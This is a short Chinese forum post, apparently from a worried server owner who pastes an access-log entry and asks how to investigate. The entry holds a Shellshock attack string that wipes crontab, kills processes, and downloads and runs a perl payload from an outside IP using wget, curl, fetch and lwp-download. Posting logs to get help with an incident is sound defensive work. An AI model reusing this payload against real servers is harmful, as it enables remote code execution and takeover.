@
msg7086 别吓我呀
下面是其中一条日志,上面的链接就是我直接粘贴复制找到的
31.184.195.114 - - [30/Apr/2016:09:39:22 +0800] "GET /phppath/php4 HTTP/1.1" 403 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://31.184.194.100/batman-vs-superman ; fetch http://31.184.194.100/batman-vs-superman ; curl -O http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'"
结合上面的脚本和日志
能否说下我该怎么排查吗?
非常感谢!!!